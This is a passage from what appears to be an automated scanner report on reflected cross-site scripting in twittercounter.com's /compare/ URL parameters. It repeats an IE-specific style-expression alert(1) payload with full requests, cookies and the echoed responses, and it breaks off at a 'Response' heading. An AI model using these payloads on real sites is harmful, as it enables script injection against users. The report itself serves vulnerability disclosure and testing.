<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/month97f2c"style="x:expression(alert(1))"33c0cb4e2b4/followers" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc965"style%3d"x%3aexpression(alert(1))"40fde4917d0 was submitted in the REST URL parameter 4. This input was echoed as bc965"style="x:expression(alert(1))"40fde4917d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/month/followersbc965"style%3d"x%3aexpression(alert(1))"40fde4917d0 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:24 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22116
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/month/followersbc965"style="x:expression(alert(1))"40fde4917d0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf762"style%3d"x%3aexpression(alert(1))"f74c76a3dda was submitted in the REST URL parameter 1. This input was echoed as cf762"style="x:expression(alert(1))"f74c76a3dda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /comparecf762"style%3d"x%3aexpression(alert(1))"f74c76a3dda/ABTD/week/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:14 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/comparecf762"style="x:expression(alert(1))"f74c76a3dda/ABTD/week/followers" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad12"style%3d"x%3aexpression(alert(1))"f50f9ae06d0 was submitted in the REST URL parameter 2. This input was echoed as 5ad12"style="x:expression(alert(1))"f50f9ae06d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD5ad12"style%3d"x%3aexpression(alert(1))"f50f9ae06d0/week/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:29 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD5ad12"style="x:expression(alert(1))"f50f9ae06d0/week/followers" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c85b"style%3d"x%3aexpression(alert(1))"64732e25403 was submitted in the REST URL parameter 3. This input was echoed as 7c85b"style="x:expression(alert(1))"64732e25403 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/week7c85b"style%3d"x%3aexpression(alert(1))"64732e25403/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:36 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22203
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/week7c85b"style="x:expression(alert(1))"64732e25403/followers" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b14"style%3d"x%3aexpression(alert(1))"0e75bbb40f5 was submitted in the REST URL parameter 4. This input was echoed as a1b14"style="x:expression(alert(1))"0e75bbb40f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/week/followersa1b14"style%3d"x%3aexpression(alert(1))"0e75bbb40f5 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:42 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/week/followersa1b14"style="x:expression(alert(1))"0e75bbb40f5" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b5f"style%3d"x%3aexpression(alert(1))"38b3471f7f7 was submitted in the REST URL parameter 1. This input was echoed as b9b5f"style="x:expression(alert(1))"38b3471f7f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compareb9b5f"style%3d"x%3aexpression(alert(1))"38b3471f7f7/ABTD/week/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:13 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compareb9b5f"style="x:expression(alert(1))"38b3471f7f7/ABTD/week/friends" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61729"style%3d"x%3aexpression(alert(1))"08f4c0c10b8 was submitted in the REST URL parameter 2. This input was echoed as 61729"style="x:expression(alert(1))"08f4c0c10b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD61729"style%3d"x%3aexpression(alert(1))"08f4c0c10b8/week/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:30 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD61729"style="x:expression(alert(1))"08f4c0c10b8/week/friends" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf4d"style%3d"x%3aexpression(alert(1))"6e3004da79e was submitted in the REST URL parameter 3. This input was echoed as bdf4d"style="x:expression(alert(1))"6e3004da79e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/weekbdf4d"style%3d"x%3aexpression(alert(1))"6e3004da79e/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:36 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/weekbdf4d"style="x:expression(alert(1))"6e3004da79e/friends" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2fb"style%3d"x%3aexpression(alert(1))"af0656713b8 was submitted in the REST URL parameter 4. This input was echoed as da2fb"style="x:expression(alert(1))"af0656713b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/week/friendsda2fb"style%3d"x%3aexpression(alert(1))"af0656713b8 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:54 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22117
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/week/friendsda2fb"style="x:expression(alert(1))"af0656713b8" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da181"style%3d"x%3aexpression(alert(1))"5290626744a was submitted in the REST URL parameter 1. This input was echoed as da181"style="x:expression(alert(1))"5290626744a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compareda181"style%3d"x%3aexpression(alert(1))"5290626744a/ABTD/week/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:23 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compareda181"style="x:expression(alert(1))"5290626744a/ABTD/week/updates" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24b6"style%3d"x%3aexpression(alert(1))"e7377cf9cfe was submitted in the REST URL parameter 2. This input was echoed as b24b6"style="x:expression(alert(1))"e7377cf9cfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTDb24b6"style%3d"x%3aexpression(alert(1))"e7377cf9cfe/week/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:44 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTDb24b6"style="x:expression(alert(1))"e7377cf9cfe/week/updates" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebfc"style%3d"x%3aexpression(alert(1))"d93e4c07a27 was submitted in the REST URL parameter 3. This input was echoed as 8ebfc"style="x:expression(alert(1))"d93e4c07a27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/week8ebfc"style%3d"x%3aexpression(alert(1))"d93e4c07a27/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:03 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/week8ebfc"style="x:expression(alert(1))"d93e4c07a27/updates" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21d4"style%3d"x%3aexpression(alert(1))"d12bbc297d7 was submitted in the REST URL parameter 4. This input was echoed as a21d4"style="x:expression(alert(1))"d12bbc297d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/week/updatesa21d4"style%3d"x%3aexpression(alert(1))"d12bbc297d7 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:12 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22170
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/week/updatesa21d4"style="x:expression(alert(1))"d12bbc297d7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54373"style%3d"x%3aexpression(alert(1))"4909189ff67 was submitted in the REST URL parameter 1. This input was echoed as 54373"style="x:expression(alert(1))"4909189ff67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare54373"style%3d"x%3aexpression(alert(1))"4909189ff67/DiscoveryBayEnt/3month/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:37 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare54373"style="x:expression(alert(1))"4909189ff67/DiscoveryBayEnt/3month/updates" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb78"style%3d"x%3aexpression(alert(1))"5a69cdf4f96 was submitted in the REST URL parameter 2. This input was echoed as dbb78"style="x:expression(alert(1))"5a69cdf4f96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEntdbb78"style%3d"x%3aexpression(alert(1))"5a69cdf4f96/3month/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:44 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEntdbb78"style="x:expression(alert(1))"5a69cdf4f96/3month/updates" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3551e"style%3d"x%3aexpression(alert(1))"04bb6245db was submitted in the REST URL parameter 3. This input was echoed as 3551e"style="x:expression(alert(1))"04bb6245db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/3month3551e"style%3d"x%3aexpression(alert(1))"04bb6245db/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:48 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/3month3551e"style="x:expression(alert(1))"04bb6245db/updates" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db90"style%3d"x%3aexpression(alert(1))"04d299d9c45 was submitted in the REST URL parameter 4. This input was echoed as 9db90"style="x:expression(alert(1))"04d299d9c45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/DiscoveryBayEnt/3month/updates9db90"style%3d"x%3aexpression(alert(1))"04d299d9c45 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:56 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/DiscoveryBayEnt/3month/updates9db90"style="x:expression(alert(1))"04d299d9c45" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff5c"style%3d"x%3aexpression(alert(1))"1d32c80c586 was submitted in the REST URL parameter 1. This input was echoed as fff5c"style="x:expression(alert(1))"1d32c80c586 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /comparefff5c"style%3d"x%3aexpression(alert(1))"1d32c80c586/DiscoveryBayEnt/month/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
